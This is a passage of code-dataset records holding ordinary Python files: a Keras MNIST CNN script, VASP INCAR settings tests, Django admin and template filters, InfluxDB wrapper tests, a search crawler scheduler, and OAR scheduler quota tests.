int,\n \"property-type\": \"APARTMENT\" | \"HOUSE\" | \"OTHERS\",\n \"rooms-number\": int,\n \"zip-code\": int,\n \"land-area\": Optional[int],\n \"garden\": Optional[bool],\n \"garden-area\": Optional[int],\n \"equipped-kitchen\": Optional[bool],\n \"full-address\": Optional[str],\n \"swimming-pool\": Optional[bool],\n \"furnished\": Optional[bool],\n \"open-fire\": Optional[bool],\n \"terrace\": Optional[bool],\n \"terrace-area\": Optional[int],\n \"facades-number\": Optional[int],\n \"building-state\": Optional[\n \"NEW\" | \"GOOD\" | \"TO RENOVATE\" | \"JUST RENOVATED\" | \"TO REBUILD\"\n ]\n }\n}'''\n\n","sub_path":"preprocessing/cleaning_data.py","file_name":"cleaning_data.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"188187806","text":"import keras\r\nfrom keras.layers.core import *\r\nfrom keras.layers.convolutional import *\r\nfrom keras.models import Sequential, load_model\r\nfrom random import randint\r\nfrom keras.utils import plot_model\r\n\r\ntest_name = 'cnn2'\r\ncount = 6000\r\nepoch = 5\r\nrand = randint(0, 60000-count)\r\ncount = rand + count\r\n\r\nmnist = keras.datasets.mnist\r\n\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\r\nx_train, x_test = x_train / 255.0, x_test / 255.0\r\n\r\nx_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\r\nx_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\r\n\r\ntry:\r\n model = load_model('%s.hdf5' % test_name)\r\nexcept Exception as e:\r\n model = Sequential()\r\n model.add(Conv2D(6, kernel_size=(3, 3), strides=(1, 1),\r\n activation='relu',\r\n input_shape=(28, 28, 1),\r\n name='C1'))\r\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='S1'))\r\n model.add(Conv2D(6, (3, 3), activation='relu', name='C2'))\r\n model.add(MaxPooling2D(pool_size=(2, 2), name='S2'))\r\n model.add(Conv2D(6, (3, 3), activation='relu', name='C3'))\r\n model.add(MaxPooling2D(pool_size=(2, 2), name='S3'))\r\n model.add(Flatten())\r\n model.add(Dense(120, activation='relu'))\r\n model.add(Dense(84, activation='relu'))\r\n model.add(Dense(10, activation='softmax'))\r\n\r\n model.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n\r\nmodel.fit(x_train[rand:count], y_train[rand:count], epochs=epoch)\r\n\r\nmodel.save('%s.hdf5' % test_name)\r\n\r\nprint(model.evaluate(x_test, y_test))\r\nprint(model.metrics_names)\r\n","sub_path":"cnn2.py","file_name":"cnn2.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"564802819","text":"# -*- coding: utf-8 -*-\nfrom copy import deepcopy\n\nfrom pymatgen import Composition\nfrom pymatgen.io.vasp import Potcar\n\nfrom vise.input_set.settings_incar import (\n TaskIncarSettings, XcIncarSettings, CommonIncarSettings)\nfrom vise.input_set.task import Task\nfrom vise.input_set.xc import Xc\nfrom vise.util.testing import ViseTest\n\n__author__ = \"Yu Kumagai\"\n__maintainer__ = \"Yu Kumagai\"\n\n\nclass TaskIncarSettingsTest(ViseTest):\n def setUp(self) -> None:\n mgo = self.get_structure_by_name(\"MgO\")\n self.default_kwargs = {\"task\": Task.structure_opt,\n \"structure\": mgo,\n \"potcar\": Potcar([\"Mg\", \"O\"]),\n \"num_kpoints\": 8,\n \"max_enmax\": 400.0,\n \"is_magnetization\": False,\n \"vbm_cbm\": [3.0, 8.0],\n \"npar_kpar\": True,\n \"num_nodes\": 1,\n \"encut\": None,\n \"structure_opt_encut_factor\": 1.3,\n \"dos_step_size\": 0.01}\n\n def test_structure_opt(self):\n setting = TaskIncarSettings.from_options(**self.default_kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 3,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-07,\n 'NSW': 50,\n 'EDIFFG': -0.005,\n 'KPAR': 4,\n 'ENCUT': 520.0}\n self.assertEqual(expected, setting.settings)\n\n def test_structure_opt_rough(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.structure_opt_rough\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 3,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-04,\n 'NSW': 50,\n 'EDIFFG': -0.2,\n 'KPAR': 4,\n 'POTIM': 0.1,\n 'ENCUT': 520.0}\n self.assertEqual(expected, setting.settings)\n\n def test_structure_opt_tight(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.structure_opt_tight\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'ADDGRID': True,\n 'IBRION': 2,\n 'PREC': 'A',\n 'ISIF': 3,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-08,\n 'NSW': 50,\n 'EDIFFG': -0.001,\n 'KPAR': 4,\n 'ENCUT': 520.0}\n self.assertEqual(expected, setting.settings)\n\n def test_cluster_opt(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.cluster_opt\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 2,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-07,\n 'NSW': 50,\n 'EDIFFG': -0.005,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_phonon_force(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.phonon_force\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'ADDGRID': True,\n 'IBRION': 2,\n 'PREC': 'A',\n 'ISIF': 2,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-08,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_defect(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.defect\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 2,\n 'ISMEAR': 0,\n 'ISPIN': 2,\n 'LREAL': \"A\",\n 'EDIFF': 1e-05,\n 'NSW': 50,\n 'EDIFFG': -0.03,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_band(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.band\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 4,\n 'NBANDS': 12,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_dos(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dos\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': -5,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 4,\n 'NBANDS': 12,\n 'ENCUT': 400.0,\n 'EMIN': -12.01,\n 'EMAX': 23,\n 'NEDOS': 3502}\n self.assertEqual(expected, setting.settings)\n\n def test_dielectric_dfpt(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dielectric_dfpt\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 8,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LREAL': False,\n 'LEPSILON': True,\n 'EDIFF': 1e-06,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_dielectric_finite_field(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dielectric_finite_field\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 6,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': 0,\n 'ISPIN': 1,\n 'LCALCEPS': True,\n 'POTIM': 0.015,\n 'LREAL': False,\n 'EDIFF': 1e-06,\n 'KPAR': 4,\n 'ENCUT': 400.0}\n self.assertEqual(expected, setting.settings)\n\n def test_dielectric_function(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dielectric_function\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': -5,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 4,\n 'NBANDS': 12,\n 'CSHIFT': 0.01,\n 'LOPTICS': True,\n 'ENCUT': 400.0,\n 'EMIN': -12.01,\n 'EMAX': 23,\n 'NEDOS': 3502}\n self.assertEqual(expected, setting.settings)\n\n def test_args(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dos\n kwargs[\"num_kpoints\"] = 1\n kwargs[\"is_magnetization\"] = True\n kwargs[\"vbm_cbm\"] = None\n kwargs[\"encut\"] = 800.0\n\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': 0,\n 'ISPIN': 2,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 1,\n 'NBANDS': 12,\n 'ENCUT': 800.0,\n 'EMIN': -20.01,\n 'EMAX': 20,\n 'NEDOS': 4002}\n self.assertEqual(expected, setting.settings)\n\n def test_args_2(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"task\"] = Task.dos\n kwargs[\"num_kpoints\"] = 18\n kwargs[\"num_nodes\"] = 2\n kwargs[\"structure_opt_encut_factor\"] = 1.5\n\n setting = TaskIncarSettings.from_options(**kwargs)\n expected = {'IBRION': 2,\n 'PREC': 'N',\n 'ISIF': 0,\n 'ISMEAR': -5,\n 'ISPIN': 1,\n 'LREAL': False,\n 'EDIFF': 1e-05,\n 'KPAR': 6,\n 'NBANDS': 12,\n 'ENCUT': 400.0,\n 'EMIN': -12.01,\n 'EMAX': 23,\n 'NEDOS': 3502}\n self.assertEqual(expected, setting.settings)\n\n\nclass XcIncarSettingsTest(ViseTest):\n def setUp(self) -> None:\n self.default_kwargs = {\"xc\": Xc.pbe,\n \"symbol_list\": [\"Mg\", \"O\"],\n \"factor\": 1}\n\n def test(self):\n setting = XcIncarSettings.from_options(**self.default_kwargs)\n expected = {'LWAVE': False, 'ALGO': 'N'}\n self.assertEqual(expected, setting.settings)\n\n def test_hubbard_u(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"symbol_list\"] = [\"Zn\", \"O\"]\n setting = XcIncarSettings.from_options(**kwargs)\n expected = {'ALGO': 'N',\n 'LWAVE': False,\n 'LDAUU': [5, 0],\n 'LDAU': True,\n 'LDAUTYPE': 2,\n 'LDAUPRINT': 1,\n 'LDAUL': [2, -1],\n 'LMAXMIX': 4}\n self.assertEqual(expected, setting.settings)\n\n def test_hybrid(self):\n kwargs = deepcopy(self.default_kwargs)\n kwargs[\"xc\"] = Xc.hse\n kwargs[\"factor\"] = 2\n setting = XcIncarSettings.from_options(**kwargs)\n expected = {'ALGO': 'D',\n 'LWAVE': True,\n 'NKRED': 2,\n 'HFSCREEN': 0.208,\n 'TIME': 0.4,\n 'LHFCALC': True,\n 'PRECFOCK': 'Fast',\n 'AEXX': 0.25}\n self.assertEqual(expected, setting.settings)\n\n\nclass CommonIncarSettingsTest(ViseTest):\n def setUp(self) -> None:\n self.default_kwargs = {\"potcar\": Potcar([\"Mg\", \"O\"]),\n \"composition\": Composition({\"Mg\": 1, \"O\": 2}),\n \"charge\": 1}\n\n def test(self):\n setting = CommonIncarSettings.from_options(**self.default_kwargs)\n print(setting.settings)\n expected = {'NELM': 100,\n 'LASPH': True,\n 'LORBIT': 12,\n 'LCHARG': False,\n 'SIGMA': 0.1,\n 'NELECT': 13}\n self.assertEqual(expected, setting.settings)\n","sub_path":"vise/input_set/tests/test_settings_incar.py","file_name":"test_settings_incar.py","file_ext":"py","file_size_in_byte":11623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"326265151","text":"from django.contrib import admin\nfrom .models import AgentTransport\n\n\nclass AgentTransportAdmin(admin.ModelAdmin):\n list_display = ('date', 'status', 'principal', 'shipper', 'agent', 'size', 'booking_no', 'pickup_tr', 'pickup_from', 'yard_ndd', 'return_tr', 'return_to', \\\n 'container_1','container_2', 'remark', 'work_type', 'operation_type', 'price', 'work_id', 'work_number', 'pickup_date', 'return_date', 'detail', 'summary_status')\n\n ordering = ('date', 'principal__name', 'shipper__name', 'work_type', 'booking_no', 'work_id')\n\n search_fields = ['work_id', 'booking_no', 'container_1', 'container_2']\n \nadmin.site.register(AgentTransport, AgentTransportAdmin)","sub_path":"ndd-app/agent_transport/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"645195365","text":"from unittest import mock\n\nfrom django.conf import settings\n\nimport analytics\nfrom analytics.influxdb_wrapper import InfluxDBWrapper\nfrom analytics.influxdb_wrapper import get_events_for_organisation\n\n\ndef test_write(monkeypatch):\n # Given\n mock_influxdb_client = mock.MagicMock()\n monkeypatch.setattr(analytics.influxdb_wrapper, \"influxdb_client\", mock_influxdb_client)\n\n mock_write_api = mock.MagicMock()\n mock_influxdb_client.write_api.return_value = mock_write_api\n\n influxdb = InfluxDBWrapper(\"name\", \"field_name\", \"field_value\")\n\n # When\n influxdb.write()\n\n # Then\n mock_write_api.write.assert_called()\n\n\ndef test_influx_db_query_when_get_events_then_query_api_called(monkeypatch):\n # Given\n org_id = 123\n influx_org = settings.INFLUXDB_ORG\n read_bucket = settings.INFLUXDB_BUCKET + \"_downsampled_15m\"\n query = ' from(bucket:\"%s\") \\\n |> range(start: -30d, stop: now()) \\\n |> filter(fn:(r) => r._measurement == \"api_call\") \\\n |> filter(fn: (r) => r[\"_field\"] == \"request_count\") \\\n |> filter(fn: (r) => r[\"organisation_id\"] == \"%s\") \\\n |> drop(columns: [\"organisation\", \"resource\", \"project\", \"project_id\"]) \\\n |> sum()' % (read_bucket, org_id)\n\n mock_influxdb_client = mock.MagicMock()\n monkeypatch.setattr(analytics.influxdb_wrapper, \"influxdb_client\", mock_influxdb_client)\n\n mock_query_api = mock.MagicMock()\n mock_influxdb_client.query_api.return_value = mock_query_api\n\n # When\n get_events_for_organisation(org_id)\n\n # Then\n mock_query_api.query.assert_called_once_with(org=influx_org, query=query)\n","sub_path":"src/analytics/tests/test_influxdb_wrapper.py","file_name":"test_influxdb_wrapper.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"210423635","text":"# -*- coding:utf-8 -*-\n# filename:crawlerTask\n# 16/2/6 下午11:59\nimport datetime\nimport os\nimport sys\nimport threading\n\nfrom config.basicConfig import PROJECT_PATH\nfrom database.BaseMySQL import MySQL\nfrom model.BaseModel import Alumni\nimport spider.pageForBaidu\nimport spider.pageForSo360\nimport spider.pageForSogou\nimport logging\nimport logging.handlers\nfrom utils.basicTool import Num\n\n__author__ = 'bingone'\nlogger = logging.getLogger('crawlerTask')\n# fh = logging.handlers.TimedRotatingFileHandler(PROJECT_PATH + '/log/crawlerTask.log', when='D',encoding='utf8')\n# fh.setLevel(logging.INFO)\n# fh.setFormatter(logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n# datefmt='%a, %d %b %Y %H:%M:%S'))\n# logger.addHandler(fh)\nglobal crawlerNum\ncrawlerNum = Num()\nmysql = MySQL.Instance()\n\ndef crawlerTask():\n pass\n reload(sys)\n sys.setdefaultencoding('utf-8')\n # baidu sogou 360\n mysqlSession = mysql.session\n query = mysqlSession.query(Alumni)\n lst = query.all()\n mysqlSession.close()\n logger.warn(\"crawlerTask start\")\n global crawlerNum\n crawlerNum.clear()\n t1 = threading.Thread(target=spider.pageForBaidu.Baidu.crawlerBaidu(lst), name='crawlerBaidu')\n t2 = threading.Thread(target=spider.pageForSogou.Sogou.crawlerSogou(lst), name='crawlerSogou')\n t3 = threading.Thread(target=spider.pageForSo360.So360.crawlerSo360(lst), name='crawlerSo360')\n t1.start()\n t2.start()\n t3.start()\n t1.join()\n t2.join()\n t3.join()\n logger.warn(\"crawlerPage:\" + str(crawlerNum.num) + \" crawlerTask end\")\n # for t in query.all():\n # words=[t.industry,t.name]\n # baidu = Baidu(word=words, sch_id=t.graduate, alumni_id=t.alumni_id)\n # baidu.parseHtml()\n # sogou = Sogou(word=words, sch_id=t.graduate, alumni_id=t.alumni_id)\n # sogou.parseHtml()\n # sogou = So360(word=words, sch_id=t.graduate, alumni_id=t.alumni_id)\n # sogou.parseHtml()\n\n\ndef startCrawlerTask():\n from apscheduler.schedulers.blocking import BlockingScheduler\n scheduler = BlockingScheduler()\n scheduler.add_job(crawlerTask, 'cron', second='0',minute='15', hour='8')\n print('Press Ctrl+{0} to exit'.format('Break' if os.name == 'nt' else 'C'))\n try:\n scheduler.start()\n except (KeyboardInterrupt, SystemExit):\n scheduler.shutdown()\n\n\nif __name__ == '__main__':\n crawlerTask()\n # print datetime.datetime.now()\n# startCrawlerTask()\n","sub_path":"bingone_crawler/spider/crawlerTask.py","file_name":"crawlerTask.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"100670870","text":"from itertools import product\n\nimport pandas as pd\n\nfrom source_code.core.hypothesis_evaluation.test_handler import run_tests_for\nfrom source_code.utils.tools import experiment_name\n\n\ndef run_experiments(pivots, segmentations, df, test_type=\"mean\", test_arg=\"Two-Samples\", error_correction_test=\"FDR\",\n threshold=0.05,\n plot=False, output_prefix=\"\"):\n names = []\n print(\"EXPT\")\n for (pivot_type, pivot_arg), (segmentation_type, segmentation_arg) in product(pivots, segmentations):\n if pivot_type is None:\n test_arg = 'One-Sample'\n\n name = experiment_name(pivot_type, pivot_arg, segmentation_type, segmentation_arg)\n result = run_tests_for(df, pivot_type, pivot_arg, segmentation_type, segmentation_arg, test_type, test_arg,\n error_correction_test, threshold, plot)\n if not len(result):\n print(\"No result found \", name)\n continue\n names.append(f\"experiments/results/{output_prefix}\" + name + \".csv\")\n pd.DataFrame(result).to_csv(names[-1])\n print(\"DDDone\", name)\n return names\n","sub_path":"source_code/notebooks/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"67438314","text":"# coding: utf-8\nimport pytest\n\nfrom procset import ProcSet\n\nfrom codecs import open\nfrom copy import deepcopy\nfrom tempfile import mkstemp\nfrom oar.lib.job_handling import JobPseudo\nfrom oar.kao.slot import Slot, SlotSet\nfrom oar.kao.scheduling import (schedule_id_jobs_ct,\n set_slots_with_prev_scheduled_jobs)\nimport oar.kao.quotas as qts\nimport oar.lib.resource as rs\n\nfrom oar.lib import config, get_logger\n\n# import pdb\n\nconfig['LOG_FILE'] = ':stderr:'\nlogger = get_logger(\"oar.test\")\n\n\"\"\"\n quotas[queue, project, job_type, user] = [int, int, float];\n | | |\n maximum used resources ----------+ | |\n maximum number of running jobs -------+ |\n maximum resources times (hours) ------------+\n\"\"\"\n\n\ndef compare_slots_val_ref(slots, v):\n sid = 1\n i = 0\n while True:\n slot = slots[sid]\n (b, e, itvs) = v[i]\n if ((slot.b != b) or (slot.e != e)\n or not slot.itvs == itvs):\n return False\n sid = slot.next\n if (sid == 0):\n break\n i += 1\n return True\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef oar_conf(request):\n config['QUOTAS'] = 'yes'\n\n def remove_quotas():\n config['QUOTAS'] = 'no'\n\n request.addfinalizer(remove_quotas)\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef reset_quotas():\n qts.quotas_rules = {}\n qts.quotas_job_types = ['*']\n\n\ndef test_quotas_one_job_no_rules():\n config['QUOTAS'] = 'yes'\n\n v = [(0, 59, ProcSet(*[(17, 32)])), (60, 100, ProcSet(*[(1, 32)]))]\n\n res = ProcSet(*[(1, 32)])\n ss = SlotSet(Slot(1, 0, 0, res, 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, types={}, deps=[], key_cache={},\n queue='default', user='toto', project='',\n mld_res_rqts=[\n (1, 60,\n [([(\"node\", 2)], res)]\n )\n ], ts=False, ph=0)\n\n schedule_id_jobs_ct(all_ss, {1: j1}, hy, [1], 20)\n\n assert compare_slots_val_ref(ss.slots, v)\n\n\ndef test_quotas_one_job_rule_nb_res_1():\n config['QUOTAS'] = 'yes'\n # quotas.set_quotas_rules({('*', '*', '*', '/'): [1, -1, -1]})\n # global quotas_rules\n qts.quotas_rules = {('*', '*', '*', '/'): [1, -1, -1]}\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = ProcSet(*res)\n\n ss = SlotSet(Slot(1, 0, 0, ProcSet(*res), 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, queue='default', user='toto', project='')\n j1.simple_req(('node', 2), 60, res)\n\n schedule_id_jobs_ct(all_ss, {1: j1}, hy, [1], 20)\n\n print(j1.start_time)\n assert j1.res_set == ProcSet()\n\n\ndef test_quotas_one_job_rule_nb_res_2():\n\n config['QUOTAS'] = 'yes'\n # quotas.set_quotas_rules({('*', '*', '*', '/'): [1, -1, -1]})\n # global quotas_rules\n qts.quotas_rules = {('*', '*', '*', '/'): [16, -1, -1]}\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = res\n\n ss = SlotSet(Slot(1, 0, 0, res, 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=2, types={}, deps=[], key_cache={},\n queue='default', user='toto', project='',\n mld_res_rqts=[\n (1, 60,\n [([(\"node\", 2)], res)]\n )\n ], ts=False, ph=0)\n\n schedule_id_jobs_ct(all_ss, {1: j1}, hy, [1], 20)\n\n assert j1.res_set == ProcSet(*[(1, 16)])\n\n\ndef test_quotas_four_jobs_rule_1():\n\n config['QUOTAS'] = 'yes'\n # quotas.set_quotas_rules({('*', '*', '*', '/'): [1, -1, -1]})\n # global quotas_rules\n qts.quotas_rules = {('*', '*', '*', '/'): [16, -1, -1],\n ('*', 'yop', '*', '*'): [-1, 1, -1]}\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = ProcSet(*res)\n\n ss = SlotSet(Slot(1, 0, 0, ProcSet(*res), 0, 10000))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, start_time=0, walltime=20,\n queue='default', user='toto', project='',\n res_set=ProcSet(*[(9, 24)]), types={}, ts=False, ph=0)\n j2 = JobPseudo(id=2, start_time=0, walltime=50,\n queue='default', user='lulu', project='yop',\n res_set=ProcSet(*[(1, 8)]))\n\n j3 = JobPseudo(id=3, queue='default', user='toto', project='')\n j3.simple_req(('node', 1), 10, res)\n\n j4 = JobPseudo(id=4, queue='default', user='lulu', project='yop')\n j4.simple_req(('node', 1), 60, res)\n\n set_slots_with_prev_scheduled_jobs(all_ss, [j1, j2], 5)\n\n ss.show_slots()\n # pdb.set_trace()\n schedule_id_jobs_ct(all_ss, {3: j3, 4: j4}, hy, [3, 4], 5)\n\n print(j3.start_time, j4.start_time)\n\n assert j3.start_time == 20\n assert j3.res_set == ProcSet(*[(9, 16)])\n assert j4.start_time == 50\n assert j4.res_set == ProcSet(*[(1, 8)])\n\n\ndef test_quotas_three_jobs_rule_1():\n\n config['QUOTAS'] = 'yes'\n # quotas.set_quotas_rules({('*', '*', '*', '/'): [1, -1, -1]})\n # global quotas_rules\n qts.quotas_rules = {('*', '*', '*', '/'): [16, -1, -1],\n ('default', '*', '*', '*'): [-1, -1, 2000]}\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = ProcSet(*res)\n\n ss = SlotSet(Slot(1, 0, 0, ProcSet(*res), 0, 10000))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, start_time=50, walltime=100,\n queue='default', user='toto', project='',\n res_set=ProcSet(*[(17, 24)]), types={}, ts=False, ph=0)\n\n j2 = JobPseudo(id=2, queue='default', user='toto', project='')\n j2.simple_req(('node', 1), 200, res)\n\n j3 = JobPseudo(id=3, queue='default', user='lulu', project='yop')\n j3.simple_req(('node', 1), 100, res)\n\n set_slots_with_prev_scheduled_jobs(all_ss, [j1], 5)\n\n ss.show_slots()\n # pdb.set_trace()\n schedule_id_jobs_ct(all_ss, {2: j2, 3: j3}, hy, [2, 3], 5)\n\n print(j2.start_time, j3.start_time)\n\n assert j2.start_time == 150\n assert j2.res_set == ProcSet(*[(1, 8)])\n assert j3.start_time == 0\n assert j3.res_set == ProcSet(*[(1, 8)])\n\n\ndef test_quotas_two_job_rules_nb_res_quotas_file():\n\n config['QUOTAS'] = 'yes'\n _, quotas_file_name = mkstemp()\n config['QUOTAS_FILE'] = quotas_file_name\n\n # quotas_file = open(quotas_file_name, 'w')\n with open(config['QUOTAS_FILE'], 'w', encoding=\"utf-8\") as quotas_fd:\n quotas_fd.write('{\"quotas\": {\"*,*,*,toto\": [1,-1,-1],\"*,*,*,john\": [150,-1,-1]}}')\n\n qts.load_quotas_rules()\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = res\n\n ss = SlotSet(Slot(1, 0, 0, res, 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n\n j1 = JobPseudo(id=1, types={}, deps=[], key_cache={},\n queue='default', user='toto', project='',\n mld_res_rqts=[\n (1, 60,\n [([(\"node\", 2)], res)]\n )\n ], ts=False, ph=0)\n\n j2 = JobPseudo(id=2, types={}, deps=[], key_cache={},\n queue='default', user='tutu', project='',\n mld_res_rqts=[\n (1, 60,\n [([(\"node\", 2)], res)]\n )\n ], ts=False, ph=0)\n\n schedule_id_jobs_ct(all_ss, {1: j1, 2: j2}, hy, [1, 2], 20)\n\n assert j1.res_set == ProcSet()\n assert j2.res_set == ProcSet(*[(1, 16)])\n\n\ndef test_quotas_two_jobs_job_type_proc():\n config['QUOTAS'] = 'yes'\n _, quotas_file_name = mkstemp()\n config['QUOTAS_FILE'] = quotas_file_name\n\n # quotas_file = open(quotas_file_name, 'w')\n with open(config['QUOTAS_FILE'], 'w', encoding=\"utf-8\") as quotas_fd:\n quotas_fd.write('{\"quotas\": {\"*,*,yop,*\": [-1,1,-1]}, \"quotas_job_types\": [\"yop\"]}')\n\n qts.load_quotas_rules()\n\n print(qts.quotas_rules, qts.quotas_job_types)\n\n res = ProcSet(*[(1, 32)])\n rs.default_resource_itvs = res\n\n ss = SlotSet(Slot(1, 0, 0, res, 0, 100))\n all_ss = {\"default\": ss}\n hy = {'node': [ProcSet(*x) for x in [[(1, 8)], [(9, 16)], [(17, 24)], [(25, 32)]]]}\n \n j1 = JobPseudo(id=1, queue='default', user='toto', project='', types={'yop'})\n j1.simple_req(('node', 1), 50, res)\n j2 = JobPseudo(id=2, queue='default', user='toto', project='', types={'yop'})\n j2.simple_req(('node', 1), 50, res)\n\n schedule_id_jobs_ct(all_ss, {1: j1, 2: j2}, hy, [1, 2], 20)\n\n print(j1.start_time, j2.start_time)\n\n assert j1.start_time == 0\n assert j2.start_time == 50\n","sub_path":"tests/kao/test_quotas.py","file_name":"test_quotas.py","file_ext":"py","file_size_in_byte":8781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"11860695","text":"from django import template\nfrom decimal import *\n\nregister = template.Library()\n\n# Operations\n# + Decimal\n@register.filter\ndef add_decimal(value, arg):\n result = None\n if arg is None:\n result = value\n elif value is None:\n result = arg\n else:\n result = Decimal(Decimal(value) + Decimal(arg))\n return float(result)\n@register.filter\ndef subtract_decimal(value, arg):\n result = None\n if arg is None:\n result = value\n elif value is None:\n result = arg\n else:\n result = Decimal(Decimal(value) - Decimal(arg))\n return float(result)\n# + Dictionary\n@register.filter\ndef dict_total(value, arg):\n total = 0\n for item in value:\n total = total + item[arg]\n return total\n# + List\n@register.filter\ndef list_total(value, arg):\n total = 0\n for item in value:\n total = total + getattr(item, arg)\n return total\n# + Manager\n@register.filter\ndef manager_total(value, arg):\n total = 0\n for item in value:\n total = total + getattr(item, arg)\n return total\n\n# Specific Actions\n@register.filter\ndef margin_total(value):\n total = 0\n for item in 